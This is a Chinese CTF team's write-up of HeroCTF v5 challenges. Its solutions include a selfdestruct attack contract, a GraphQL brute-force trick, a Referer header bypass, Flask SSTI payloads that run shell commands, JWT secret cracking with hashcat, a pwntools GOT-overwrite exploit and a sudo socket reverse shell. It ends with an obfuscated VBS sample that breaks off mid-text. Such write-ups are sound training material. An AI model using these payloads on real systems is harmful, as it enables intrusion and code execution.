点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:39795字
阅读时长:10分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
HeroCTF v5
星期六, 13 五月 2023, 03:00-星期一, 15 五月 2023, 05:00。
https://ctf.heroctf.fr
相关附件关注公众号回复 HeroCTFv5 获取
WEB | PWN | RE | MISC | Crypto | IOT
Blockchain
Challenge 00 : Oh sh. Here we go again
题目
题解
部署合约后只有合约地址,需要反编译合约
// Decompiled by library.dedaub.com
// 2023.05.12 19:25 UTC
// Compiled using the solidity compiler version 0.8.17
// Data structures and variables inferred from the use of storage instructions
uint256 _win; // STORAGE[0x0] bytes 0 to 0
uint256 stor_0_1_1; // STORAGE[0x0] bytes 1 to 1
function () public payable {
revert();
}
function 0x3c5269d8() public payable {
_win = 1;
}
function 0x459a2790() public payable {
return stor_0_1_1;
}
function win() public payable {
v0 = v1 = _win;
if (v1) {
v0 = stor_0_1_1;
}
return bool(v0);
}
function 0x75ec067a() public payable {
if (_win) {
stor_0_1_1 = 1;
}
}
function 0xe9a37061() public payable {
return _win;
}
// Note: The function selector is not present in the original solidity code.
// However, we display it for the sake of completeness.
function __function_selector__(bytes4 function_selector) public payable {
MEM[64] = 128;
require(!msg.value);
if (msg.data.length >= 4) {
if (0x3c5269d8 == function_selector >> 224) {
0x3c5269d8();
} else if (0x459a2790 == function_selector >> 224) {
0x459a2790();
} else if (0x473ca96c == function_selector >> 224) {
win();
} else if (0x75ec067a == function_selector >> 224) {
0x75ec067a();
} else if (0xe9a37061 == function_selector >> 224) {
0xe9a37061();
}
}
();
}
其中关注的函数有这几个
function 0x3c5269d8() public payable:将_win变量设置为1。
function 0x459a2790() public payable:返回stor_0_1_1变量的值。
function 0x75ec067a() public payable:如果_win为真,则将stor_0_1_1变量设置为1。
function 0xe9a37061() public payable:返回_win变量的值。
题目目标可能为将 win 和 stor_0_1_1变量 设置为 1 即可, 通过小狐狸发送两次调用函数的十六进制数据设置变量
Challenge 01 : Classic one tbh
题目
题解
合约源码
pragma solidity 0.8.17;
contract hero2303
{
mapping (address => uint256) private userBalances;
uint256 public constant TOKEN_PRICE = 1 ether;
string public constant name = "UNDIVTOK";
string public constant symbol = "UDK";
uint8 public constant decimals = 0;
uint256 public totalSupply;
function buy(uint256 _amount) external payable {
require(
msg.value == _amount * TOKEN_PRICE,
"Ether submitted and Token amount to buy mismatch"
);
userBalances[msg.sender] += _amount;
totalSupply += _amount;
}
function sell(uint256 _amount) external {
require(userBalances[msg.sender] >= _amount, "Insufficient balance");
userBalances[msg.sender] -= _amount;
totalSupply -= _amount;
(bool success, ) = msg.sender.call{value: _amount * TOKEN_PRICE}("");
require(success, "Failed to send Ether");
assert(getEtherBalance() == totalSupply * TOKEN_PRICE);
}
function transfer(address _to, uint256 _amount) external {
require(_to != address(0), "_to address is not valid");
require(userBalances[msg.sender] >= _amount, "Insufficient balance");
userBalances[msg.sender] -= _amount;
userBalances[_to] += _amount;
}
function getEtherBalance() public view returns (uint256) {
return address(this).balance;
}
function getUserBalance(address _user) external view returns (uint256) {
return userBalances[_user];
}
}
漏洞点为 sell 函数
function sell(uint256 _amount) external {
require(userBalances[msg.sender] >= _amount, "Insufficient balance");
userBalances[msg.sender] -= _amount;
totalSupply -= _amount;
(bool success, ) = msg.sender.call{value: _amount * TOKEN_PRICE}("");
require(success, "Failed to send Ether");
assert(getEtherBalance() == totalSupply * TOKEN_PRICE);
}
assert(getEtherBalance() == totalSupply * TOKEN_PRICE);
assert断言条件为锁定的以太币要与总供应量相同,题目条件为使任何人调用 sell 函数无法卖出,我们只需要利用自毁函数 selfdestruct 强行打破代币平衡,导致无法出售
pragma solidity 0.8.17;
contract Attack {
address tokenaddr;
constructor(address _tokenaddr) {
tokenaddr = _tokenaddr;
}
function attack() external payable {
require(msg.value != 0, "Error");
address payable target = payable(tokenaddr);
selfdestruct(target);
}
}
WEB
Best Schools
题目
题解
解法1:代理池爆破绕过IP速率限制(非预期)
存在爆破速率限制,代理池轮询爆破即可。(正常思路应该是graphql注入)
解法2:graphql 批量查询
Graphql可以在同一个HTTP请求中,发送多个query请求。只需将发送的query请求作为一个数组即可。
单个query请求:
{"query":"mutation { increaseClickSchool(schoolName: "Flag CyberSecurity School"){schoolId, nbClick} }"}
批量query请求:
[
{"query":"mutation { increaseClickSchool(schoolName: "Flag CyberSecurity School"){schoolId, nbClick} }"},
{"query":"mutation { increaseClickSchool(schoolName: "Flag CyberSecurity School"){schoolId, nbClick} }"},
...
]
利用Intruder中的 Character blocks payloads类型,即可完成爆破:
成功并发多个query请求:
Get Flag:
Referrrrer
题目
题解
该题是一个使用express框架的node.js应用,中间有一个nginx做代理服务器:用户请求 -> Nginx代理服务器 -> Express应用。
Nginx的配置文件中,/admin 接口限制只有Referer头的值为: https://admin.internal.com/ 的HTTP请求才允许被转发。
location /admin {
if ($http_referer !~* "^https://admin.internal.com") {
return 403;
}
而node.js源码中限制只有Referer头的值为YOU_SHOUD_NOT_PASS!的请求,才能获得带有FLAG的HTTP响应。
app.get("/admin", (req, res) => {
if (req.header("referer") === "YOU_SHOUD_NOT_PASS!") {
return res.send(process.env.FLAG);
}
}
正常来讲如果想要同一个请求头被Nginx和Express读取为不同的值,就需要利用Nginx与Express对Referer头解析的差异性。
Referer请求头是RFC文档中官方定义的用于记录请求来源地址的HTTP请求头字段,而Referer实际上是Referrer这个单词的错误拼写,这是一个历史遗留的问题。
在Express6.0版本之前,Express开发者自行加入了对两种拼法全部支持的特性,甚至Referrer的优先级比官方规定的Referer更高(https://github.com/expressjs/express/issues/3951);而Nginx完全按照RFC文档的规定进行开发,不会将似乎正确的拼法Referrer解析为Referer字段。
因此,利用这个差异性,即可绕过两个Referer检查的限制:
GET /admin HTTP/1.1
Host: app
Referer: https://admin.internal.com/
Referrer: YOU_SHOUD_NOT_PASS!
Drink from my Flask#1
题目
题解
URI处存在SSTI,且限制模板内长度为30字节:http://DOMAIN/{{config}}另一接口/adminPage访问提示 guest 用户无法访问,身份标识存在于服务下发的JWT中。
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww
Header:
{
"typ": "JWT",
"alg": "HS256"
}
Payload:
{
"role": "guest"
}
Signature:
AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww
由于SSTI限制34字节,此时有两个思路:1、绕过长度限制读flag;2、利用SSTI获得JWT的secret_key,修改role到admin并用key签名。
解法1:34字节SSTI RCE
通过 config.update 缓存制造变量,找一个 __globals__ 可以用第一个 config.update 存入的
https://flask.palletsprojects.com/en/2.0.x/config/
{{config.update(a=config.update)}}
{{config.a(b=lipsum.__globals__)}}
{{config.a(c=config.b.os)}}
{{config.a(d=config.c.popen)}}
读取 flag.txt 长度也有限制 用 cat f*t 读取
/{{config.d('cat f*t').read()}}
解法2:JWT弱key,Token data段中的role处存在无长度限制RCE
通过 Hashcat 使用弱密码爆破 JWT:
hashcat -a 0 -m 16500 eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww ~/Github/brute_dict/jwt.secrets.list
可以得到 secret key 是 key
利用 https://jwt.io/ 使用密钥 key 对Token签名,可以看出,role字段会有回显:
可以想到此处即是无长度限制的SSTI注入点,SSTI payloads用key加密好直接打:
{{self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag*').read()}}
Pwn
Appointment Book
题目
题解
时间戳逆向拼凑bin_sh地址 二分直接找
#!/usr/bin/python2
from pwn import *
context(arch='amd64',endian='el',os='linux')
context.log_level='debug'
context.terminal = ['tmux','splitw','-h']
l64 = lambda :u64(p.recvuntil("x7f")[-6:].ljust(8,"x00"))
l32 = lambda :u32(p.recvuntil("xf7")[-4:].ljust(4,"x00"))
leak = lambda name,data : p.success(name + ": 0x%x" % data)
sd = lambda payload: p.send(payload)
sa = lambda a,b :p.sendafter(str(a),str(b))
sl = lambda payload: p.sendline(payload)
sla = lambda a,b :p.sendlineafter(str(a),str(b))
ru = lambda a :p.recvuntil(str(a))
r = lambda a :p.recv(str(a))
debug = 2
if debug == 1:
p = process(['./chall'])
else:
p = remote('static-03.heroctf.fr',5000)
elf = ELF('./chall',checksec=False)
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
bin_sh = 0x00000000040133E
# 4170422
sla("Your choice: ",2)
sla("Enter the index of this appointment (0-7): ",-13)
pd = "1970-02-18 14:27:02"
# gdb.attach(p,'b *0x0000000000401611nc')
sla("[+] Enter a date and time (YYYY-MM-DD HH:MM:SS):",pd)
# sl("")
sleep(0.02)
sla("[+] Enter an associated message (place, people, notes...):",'a')
p.interactive()
flag:
Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}
Prog
Math Trap
题目
题解
题目是需要进行计算,给出计算公式进行计算,脚本方法是将远程服务器端发送的计算公式转换成字符串使用eval执行。
# coding=utf-8
from pwn import *
r = remote('static-01.heroctf.fr', 8000)
def calculate(formula):
# 验证输入是否合法
allowed_chars = set('0123456789.+-*/() ')
if not set(formula) <= allowed_chars:
raise ValueError('Illegal characters in formula')
# 将输入的字符串作为 Python 代码执行,并得到计算结果
try:
result = eval(formula)
except ZeroDivisionError:
raise ValueError('Division by zero')
except Exception as e:
raise ValueError(f'Error during calculation: {str(e)}')
return result
while True:
# 获取远程连接并获取返回内容
content = r.recv().decode()
if not content:
break
print(content)
formula = content.split('n')[-2]
#print(formula)
if formula:
# 计算公式
result = calculate(formula)
print(f"计算结果为:{result}")
# 发送计算结果至远程主机
r.sendline(str(result).encode())
# 关闭远程连接
r.close()
Forensic
dev.corp 1/4
题目
题解
这是一个日志分析题,首先去搜索GET 或者POST请求,在请求中发现攻击者请求了很多admin-ajax.php文件。直接过滤admin-ajax.php文件筛选出返回成功的请求就能找到。可以看到是请求了三个文件,题目要求是最敏感的文件所以是id_rsa_backup。同时根据admin-ajax.php 可以搜索到对应的CVE漏洞编号。
Hero{CVE-2020-11738:/home/webuser/.ssh/id_rsa_backup}
SYSTEM
Chm0d
题目
题解
http://www.fblinux.com/?p=30
SUDOkLu
题目
题解
user@sudoklu:~$ sudo -l
Matching Defaults entries for user on sudoklu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty
User user may run the following commands on sudoklu:
(privilegeduser) NOPASSWD: /usr/bin/socket
socket 以 privilegeduser 身份反弹shell
sudo -u privilegeduser /usr/bin/socket -qvp '/bin/sh -i' xxx.xxx.xxx.xxx 12345
Misc
PNG-G
题目
题解
是APNG文件 使用APNG查看器打开就能看到https://products.aspose.app/imaging/zh-hans/image-view/apng
PDF-Mess
题目
题解
binwalk 分离出一个js
const CryptoJS=require('crypto-js'),key='3d3067e197cf4d0a',ciphertext=CryptoJS['AES']['encrypt'](message,key)['toString'](),cipher='U2FsdGVkX1+2k+cHVHn/CMkXGGDmb0DpmShxtTfwNnMr9dU1I6/GQI/iYWEexsod';
crypto-js解密获得结果 https://tool.oschina.net/encrypt/
Subliminal#2
题目
题解
是一个mp4文件 会发现有个小方块一直出现,题目给了20x20像素。
首先分离所有帧率
import cv2
# 读取视频文件
cap = cv2.VideoCapture('video.mp4')
# 定义帧数计数器
frame_count = 0
while cap.isOpened():
# 逐帧读取视频
ret, frame = cap.read()
if not ret:
break
# 将当前帧保存成一张图片,图片命名以帧数命名
cv2.imwrite('frame_{}.jpg'.format(frame_count), frame)
# 帧数加一
frame_count += 1
# 释放资源
cap.release()
然后从左上到右下规律提取小方块 拼接成图片
import cv2
import numpy as np
# 定义空列表存储所有小方块
block_list = []
# 遍历所有帧,读取小方块
for i in range(2304):
# 读取当前帧的图片
frame = cv2.imread('frame_{}.jpg'.format(i))
# 提取小方块,左上角位置为(x, y),大小为(w, h)
x, y = (i % 64) * 20, (i // 64) * 20
w, h = 20, 20
block = frame[y:y+h, x:x+w]
# 将小方块添加到列表中
block_list.append(block)
# 计算输出图片大小
rows = 36
cols = 64
output_size = (cols * 20, rows * 20)
# 初始化空白画布
canvas = np.zeros((output_size[1], output_size[0], 3), dtype=np.uint8)
# 拼接小方块到画布中
for i in range(rows):
for j in range(cols):
canvas[(i*20):(i+1)*20, (j*20):(j+1)*20] = block_list[i*cols+j]
# 展示拼接后的图片
cv2.imshow('Canvas', canvas)
cv2.waitKey(0)
cv2.destroyAllWindows()
# 保存拼接后的图片
cv2.imwrite("output.jpg", canvas)
Reverse
Give My Money Back
题目
题解
解压是一个vbs的代码
dIM jJkmPKZNvhSgPGmVLdvBVgOimreRTqiaEDiOcfNqy, AxEjAhgOVVhnXPrQQdPpAItXlqhuIRHOuDWWhvoyp, FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp
Sub FncTqZirWltYCeayCzqdIRdKqrIzaKWRIZbSCprXS
JJKMpKZNvhsgPgMvldVBVGoiMRERTqiAEdIOcFNqY = "399711/3601*702350/6385*8573-8541*847693/8393*7119-7005*7714-7600*463-352*1137720/9980*214336/6698*-5139+5253*8037-7936*297045/2583*621-504*-3881+3990*304010/3010*-3548+3580*-4817+4927*-8389+8490*526440/4387*-3682+3798*-4323+4333*507525/7575*467310/4210*62040/564*609500/5300*501816/4326*114816/3588*-6176+6244*-5154+5255*941275/8185*715616/6688*-137+253*393-282*6302-6190*88928/2779*9266-9205*6871-6839*-6394+6446*-6545+6555*146261/2183*457209/4119*2924-2814*-5708+5823*3465-3349*-4285+4317*4755-4678*6414-6293*-8263+8331*2696-2585*-8556+8655*311688/2664*3415-3306*2984-2883*6213-6103*-855+971*1957-1842*-790+822*5541-5480*6376-6344*231476/4724*-7629+7683*12780/1278*7764-7681*5210-5109*-1797+1913*-2288+2320*255391/3077*1561-1529*555893/9113*141632/4426*-9588+9655*-3170+3284*-583+684*-3665+3762*129688/1118*-2354+2455*-4990+5069*6065-5967*-6483+6589*6912-6811*-9245+9344*-6022+6138*460-420*-5910+5944*-3785+3872*2678-2563*-1615+1714*911202/7993*3785-3680*651168/5814*-5690+5806*1186-1140*746004/8988*793416/7629*-5702+5803*-6182+6290*-7059+7167*223584/6576*6017-5976*195264/6102*-4986+4996*-2732+2742*726914/8758*5446-5345*305196/2631*298624/9332*-6089+6159*5128-5045*-2562+2641*-5646+5678*-5019+5080*-3803+3835*424445/6335*1049712/9208*-3368+3469*-9647+9744*851092/7337*2454-2353*-5506+5585*9421-9323*-672+778*711141/7041*-7305+7404*6810-6694*3937-3897*2151-2117*1114465/9691*-8789+8888*-7274+7388*2714-2609*-9757+9869*5102-4986*-9448+9553*-6397+6507*859329/8343*911-865*986442/9671*2876-2771*-9227+9335*2248-2147*306360/2664*238128/1968*379960/3304*3176-3060*819312/8112*452-343*323565/2915*-6257+6355*-4300+4406*758611/7511*-7874+7973*-4646+4762*6891-6857*1325-1284*6713-6703*1756-1669*110971/1337*5718-5619*1121874/9841*3931-3826*962416/8593*6614-6498*1795-1749*424047/5109*9638-9530*405818/4018*5880-5779*934528/8344*7120-7080*359072/7328*1350-1302*403920/8415*6805-6757*9719-9687*868-826*3977-3945*5914-5863*236304/4923*-6472+6513*3070/307*-7576+7586*6430/643*57720/5772*6892-6882*69690/6969*6483-6473*6742-6732*-643+758*70064/604*-1481+1595*7020-6937*3670-3593*49644/591*-6791+6871*-5818+5913*3673-3590*994345/9845*-7143+7257*424918/3601*-1979+2080*1111614/9751*4591-4559*4885-4824*6099-6067*-6441+6475*-5314+5429*900558/8262*268-152*9310-9198*9005-8959*-3099+3208*3989-3892*655620/6244*7769-7661*6885-6839*11628/102*-147+264*-4121+4155*6818-6808*971405/8447*8111-7995*-8711+8825*-9068+9152*691752/6232*311328/9729*568276/9316*6660-6628*223618/6577*-4916+5014*928898/8522*-3473+3592*2934-2821*-3346+3451*-968+1065*204792/3657*3970-3918*8701-8637*-8408+8517*402162/4146*436380/4156*157788/1461*6261-6215*10061-9947*9381-9264*36958/1087*19970/1997*903440/7856*-7934+8050*5656-5542*384860/5498*563844/4946*938616/8456*194129/1781*-8272+8304*390156/6396*8672-8640*335648/9872*-8628+8726*-2442+2551*1176672/9888*-4759+4872*-4333+4438*5032-4935*-8401+8457*-5187+5239*6978-6914*906989/8321*413-316*-7264+7369*-6592+6700*-5790+5836*309054/2711*6395-6278*-1121+1155*53730/5373*722660/6284*-5503+5619*-4737+4851*6734-6651*1387-1270*-8394+8492*472442/4457*-5483+5584*2767-2668*-973+1089*271488/8484*-1397+1458*26592/831*6003-5969*5312-5247*-2538+2611*-6352+6434*538628/7921*315208/3844*-718+797*-3187+3267*-9634+9668*2845-2835*3494-3379*-7435+7551*811566/7119*8686-8620*751581/6771*9268-9168*9509-9388*-5271+5303*-2677+2738*7420-7388*-2329+2363*-1987+2063*752396/9524*-9668+9739*-1277+1311*9000-8990*9378-9368*-5693+5703*16700/1670*-2918+2928*-414+424*-8714+8724*5220-5210*-1123+1133*600422/7234*-7529+7630*71340/615*8354-8322*508725/4845*-7502+7579*9353-9238*955737/9279*-4925+4986*-6297+6364*1099416/9644*9492-9391*-3876+3973*7550-7434*-4032+4133*-5539+5618*-1405+1503*-9544+9650*-7393+7494*-7407+7506*3984-3868*4129-4089*-2790+2824*-5766+5833*285736/4202*7845-7766*20240/440*8961-8884*355924/3524*-6731+6846*1072030/9322*921306/9498*158517/1539*73124/724*5532-5498*6917-6876*59840/1870*-6877+6887*91480/9148*291994/3518*-753+854*5625-5509*-6650+6682*2093-1988*7947-7880*403263/3633*3205-3095*837114/8207*301889/4949*-477+544*7946-7832*17877/177*64990/670*4243-4127*550551/5451*9624-9545*566146/5777*1024066/9661*618-517*-8931+9030*4231-4115*329200/8230*-2177+2211*407695/6085*362-294*2588-2509*-7680+7726*2967-2900*7603-7492*7133-7023*4436-4334*-1331+1436*7875-7772*4559-4442*3784-3670*137740/1420*4005-3889*453495/4319*-9088+9199*651090/5919*9334-9300*105944/2584*-1823+1833*-3622+3632*752312/9064*511767/5067*561440/4840*6367-6335*3718-3599*6962-6847*-1600+1704*1549-1466*763672/7343*7165-7064*6892-6784*-6315+6423*-1916+1948*174033/2853*23424/732*-3921+3988*8389-8275*62216/616*410116/4228*2034-1918*639734/6334*3601-3522*6881-6783*-1790+1896*962025/9525*-8792+8891*704352/6072*359640/8991*1347-1315*325312/9568*825-738*-1948+2031*910008/9192*765054/6711*7244-7139*440-328*664796/5731*8067-8021*-613+696*925600/8900*6037-5936*6702-6594*987876/9147*17442/513*3213-3181*-4637+4678*-5771+5781*8459-8344*418992/3612*-6863+6977*6271-6186*-8222+8337*-1571+1672*3062-2948*8994-8916*-8865+8962*-4770+4879*856480/8480*3877-3845*-795+856*9169-9137*-3712+3831*809025/7035*5835-5731*8642-8559*109616/1054*805273/7973*16524/153*1953-1845*-3747+3793*-8123+8192*1965-1845*1340-1228*3727-3630*5726-5616*-1349+1449*-7550+7619*-643+753*300664/2548*-8796+8901*447336/3924*883893/7963*-3198+3308*394144/3616*9282-9181*629-519*5034-4918*210239/2533*1027528/8858*-3952+4066*2375-2270*-8254+8364*-7488+7591*9736-9621*3497-3457*-7346+7378*-8531+8565*-4895+4932*85765/1009*6903-6820*-4933+5002*-6881+6963*1428-1350*226850/3490*734657/9541*1617-1548*4797-4760*6397-6363*18784/587*135915/3315*-2779+2789*685248/8256*581760/5760*-1354+1470*89056/2783*-4712+4782*-2331+2439*724900/7249*1106-991*-2146+2207*2687-2582*345050/5150*8826-8715*-1987+2097*725628/7114*147108/3198*1649-1579*-547+652*6631-6530*274320/2540*970400/9704*-1441+1556*64672/2021*6073-6063*5263-5193*4986-4878*4939-4839*-3760+3875*-7640+7686*1879-1806*3768-3652*55651/551*670023/6147*-6805+6845*289986/8529*-1598+1702*1603-1487*10052-9936*-3111+3223*2654-2596*388972/8276*402508/8564*-8475+8590*-3847+3946*1678-1574*125038/1238*733679/6731*1835-1738*6087-5972*6625-6579*8258-8149*2870-2765*181170/1830*5560-5446*7017-6906*4753-4638*350649/3159*961962/9431*563760/4860*-4799+4845*-5393+5492*261405/2355*6200-6091*-422+469*7350-7251*39500/395*1085247/9777*7562-7515*2656-2557*-8372+8483*-259+369*-8470+8572*390810/3722*-5914+6017*8578-8461*565-451*-3431+3528*-5918+6034*9020-8915*-2797+2908*430980/3918*-4962+5009*4634-4519*-7972+8081*5294-5178*6282-6170*421705/3667*906778/8978*-4896+5010*4464-4346*3734-3633*362292/3178*173162/5093*132799/3239*-7445+7477*3308-3247*-1644+1676*1870-1836*-6961+7076*509139/4671*-2177+2293*9082-8970*1116-1070*790-681*6752-6655*3567-3462*999864/9258*-5486+5532*1957-1843*7323-7206*-4839+4873*-7090+7100*-5230+5300*9546-9438*182200/1822*8363-8248*162472/3532*102711/1407*-3830+3946*-5511+5612*4401-4292*8365-8325*-2984+3018*-4025+4129*1157796/9981*-6405+6521*6359-6247*514518/8871*7299-7252*-3973+4020*1004985/8739*-9122+9221*7418-7314*2329-2228*8698-8589*723038/7454*-6041+6156*8464-8418*110090/1010*676620/6444*259677/2623*4939-4825*7314-7203*-2920+3035*2398-2287*325278/3189*-7546+7662*-8450+8496*-7913+8012*465201/4191*869384/7976*296711/6313*8054-7955*-6789+6889*8670-8559*382110/8130*-5488+5587*488733/4403*-9865+9975*942480/9240*983220/9364*4601-4498*325962/2786*-5961+6075*-3430+3527*957464/8254*-2961+3066*1583-1472*259710/2361*13677/291*685400/5960*140828/1292*193952/1672*9806-9694*690575/6005*430260/4260*-5365+5479*4488-4370*125240/1240*2699-2585*-8379+8491*-9123+9234*2821-2707*9661-9545*166702/4903*-1431+1472*-5075+5107*-2982+3043*211008/6594*-196+248*479898/8887*-2711+2764*1675-1665*294770/4211*-2395+2503*-2341+2441*-9798+9913*-1998+2044*268640/3680*7651-7535*6623-6522*-3187+3296*-5139+5179*-1887+1921*-7198+7302*695-579*-1557+1673*9603-9491*-7983+8041*202946/4318*178741/3803*-2223+2338*724185/7315*-6306+6410*3144-3043*8456-8347*931-834*1404-1289*-9760+9806*3677-3568*4945-4840*-9870+9969*-2528+2642*4604-4493*-2175+2290*877788/7908*4530-4428*-6948+7064*156722/3407*103554/1046*-9394+9505*4998-4889*85681/1823*8429-8330*441900/4419*557331/5021*274762/5846*402534/4066*-1751+1862*564300/5130*-4152+4254*808815/7703*97129/943*7439-7322*222756/1954*821105/8465*389064/3354*-7347+7452*7727-7616*3965-3855*29704/632*3834-3719*-602+703*3827-3717*145000/1450*-3846+3963*252080/2192*6810-6705*380820/3462*-1086+1189*251226/7389*-4010+4051*157952/4936*5484-5452*-1306+1338*312032/9751*137860/2260*-7681+7713*22600/452*9733-9701*106528/3329*61750/6175*9975-9905*4673-4565*-8776+8876*-7117+7232*709-663*2054-1981*1337-1221*318150/3150*-9326+9435*-2594+2634*218756/6434*-1040+1144*604360/5210*-450+566*831600/7425*-6491+6549*9384-9337*2452-2405*5027-4912*6472-6373*325728/3132*-2617+2718*122625/1125*365981/3773*6169-6054*-1965+2011*575-466*-2930+3035*34254/346*1099872/9648*520-409*9875-9760*-6651+6762*-4827+4929*1139584/9824*3354-3308*5986-5887*770340/6940*-8447+8556*-3885+3932*5261-5162*746300/7463*-6156+6267*2190-2143*8049-7950*4945-4834*3223-3113*422484/4142*-4198+4303*1087-984*-4947+5064*119130/1045*183718/1894*-2518+2634*-2126+2231*-1548+1659*499950/4545*95034/2022*864225/7515*251790/2310*3865-3749*-2226+2338*45202/466*305955/2615*3618-3502*-2339+2443*460762/4562*8713-8603*-8009+8125*5025-4920*-1189+1288*-5212+5309*-5907+6023*2180-2079*-1712+1746*-3948+3989*174624/5457*-5741+5802*188704/5897*3503-3454*8149-8117*8492-8460*2202-2192*71330/1019*6206-6098*517900/5179*467360/4064*20424/444*-2036+2109*12760/110*106555/1055*295608/2712*175360/4384*-7335+7369*8558-8454*229448/1978*929276/8011*920304/8217*-6728+6786*5536-5489*-210+257*3494-3379*-3585+3684*3993-3889*840-739*-3510+3619*177510/1830*-9074+9189*4896-4850*6312-6203*6051-5946*-7385+7484*238488/2092*495-384*10103-9988*750582/6762*-1527+1629*-594+710*5914-5868*8326-8227*888111/8001*365-256*48081/1023*587763/5937*879200/8792*1057275/9525*161915/3445*604791/6109*-6577+6688*-2948+3058*958188/9394*4014-3909*26677/259*-2165+2282*-2494+2608*154618/1594*8320-8204*7168-7063*668442/6022*7934-7824*301364/6412*9119-9004*8508-8399*139548/1203*-7661+7773*-5746+5863*-3346+3461*1425-1324*265190/2306*-7284+7399*343008/3176*-2044+2078*-4778+4819*-7830+7862*7110-7078*-4540+4572*-4528+4560*-8627+8659*200192/6256*4283-4222*127680/3990*9787-9671*-441+555*-526+643*613777/6077*7589-7557*-9058+9068*5722-5652*241164/2233*-3926+4026*-254+369*97060/2110*7359-7286*-4069+4185*-8901+9002*1762-1653*-9941+9981*4121-4087*9384-9280*-6263+6379*4828-4712*3536-3424*4690-4632*187718/3994*-4150+4197*963010/8374*-233+332*719472/6918*-1054+1155*1650-1541*7458-7361*2735-2620*352084/7654*8114-8005*5215-5110*4058-3959*7805-7691*4652-4541*3175-3060*2724-2613*74562/731*5385-5269*1842-1796*-6868+6967*4184-4073*577373/5297*2934-2887*-7984+8083*277600/2776*8226-8115*297416/6328*30690/310*7008-6897*638880/5808*-8229+8331*673-568*-709+812*-8505+8622*331-217*723426/7458*340460/2935*-8017+8122*650793/5863*-2693+2803*327778/6974*7622-7507*442683/4383*12540/114*-7923+8023*-2140+2257*362710/3154*-3456+3557*-7716+7830*-655+765*379173/3909*-5167+5276*-6131+6232*7300-7266*6419-6378*8929-8897*317824/9932*-6196+6228*110688/3459*533750/8750*-7739+7771*331704/9756*8747-8649*4864-4755*572033/4807*31075/275*492450/4690*7878-7781*383152/6842*-3778+3830*-1914+1978*175599/1611*-5042+5139*-1755+1860*4830-4722*-896+942*146718/1287*8755-8638*-9736+9770*3069-3059*542570/7751*7702-7594*-4347+4447*498295/4333*296102/6437*33726/462*258216/2226*-795+896*596666/5474*-3326+3366*17714/521*495352/4763*4814-4698*1335-1219*2668-2556*-6197+6255*-3990+4037*-7893+7940*578565/5031*478863/4837*-1421+1525*-6380+6481*1157-1048*5696-5599*3447-3332*139978/3043*7897-7788*8411-8306*-614+713*9682-9568*-1124+1235*4226-4111*264291/2381*9309-9207*613292/5287*-684+730*7784-7685*561216/5056*495623/4547*120461/2563*489951/4949*-5401+5501*1284-1173*240029/5107*246411/2489*5051-4940*-3728+3838*964920/9460*-4797+4902*603374/5858*-3900+4017*-5347+5461*3133-3036*2682-2566*-768+873*1239-1128*7904-7794*69231/1473*-1403+1518*9188-9087*1000670/9097*8107-8007*813904/7267*1216-1119*6644-6529*1107565/9631*908208/7632*430569/3879*9900-9786*9974-9874*-9377+9411*9048-9007*-7445+7477*8829-8797*92352/2886*179424/5607*-4459+4520*4455-4423*184654/5431*3805-3723*-4785+4837*8174-8107*826-749*610200/6780*-3266+3317*-4649+4763*429570/4995*610060/5546*102795/1335*-978+1048*-6099+6215*7938-7816*-2690+2812*-8405+8459*-4072+4190*388082/3181*522422/6371*223755/2131*2926-2877*4647-4613*4128/129*-190+200*1526-1516*49900/4990*19940/1994*9282-9212*-9075+9183*-2825+2925*-4471+4586*281014/6109*-555+640*-9533+9645*-7967+8067*-858+955*-9669+9785*5178-5077*-6345+6377*9014-9004*-9604+9709*4391-4314*-7225+7340*764260/7420*-1716+1762*413256/6168*226995/2045*-9371+9481*2822-2720*5637-5532*-4257+4360*502164/4292*9154-9040*682977/7041*6561-6445*-9181+9286*-1140+1251*3661-3551*78812/1292*3954-3849*559785/8355*1096236/9876*9001-8891*-6193+6295*111776/3493*-6640+6650*5844-5739*406329/5277*-5471+5586*-6537+6640*228942/4977*46200/550*1101-990*-2021+2082*1015-900*46052/397*-3240+3354*-6321+6405*945609/8519*-1450+1482*55290/5529*8578-8568*8071-8061*525315/5003*732578/9514*366735/3189*-6787+6890*-8112+8158*-5870+5940*-6872+6986*-2432+2543*8316-8207*8397-8336*-3485+3600*670248/5778*686850/6025*432180/6174*9181-9067*960039/8649*5385-5276*-9823+9855*-7667+7677*1588-1483*-1011+1088*9201-9086*-8643+8746*2238-2192*46314/558*2046-1929*246470/2515*53106/501*-4454+4555*7410-7311*1008620/8695*583099/9559*342125/2975*2522-2406*812-698*5817-5734*-1967+2084*8118-8020*48018/453*234421/2321*2236-2137*-3468+3584*-1991+2023*27470/2747*-5949+5959*555555/5291*478478/6214*-6329+6444*6720-6617*-1326+1372*9642-9558*8213-8112*-9387+9507*147668/1273*7105-7039*-213+324*1884-1784*349811/2891*73627/1207*8898-8783*317724/2739*925224/8116*5964-5898*148074/1334*-4818+4918*2907-2786*-2719+2751*1068-1058*726499/8753*990204/9804*58464/504*-6861+6893*274176/2688*203796/1887*-3464+3564*-9218+9250*185257/3037*45632/1426*-9789+9859*269750/3250*490748/6212*6963-6917*7535-7464*776690/7690*769312/6632*1869-1799*264624/2384*320328/2966*1400-1300*753258/7458*-5473+5587*-9392+9432*9092-9009*-5330+5376*472602/5694*397488/3549*-9753+9854*9052-8953*785820/7484*-155+252*910224/8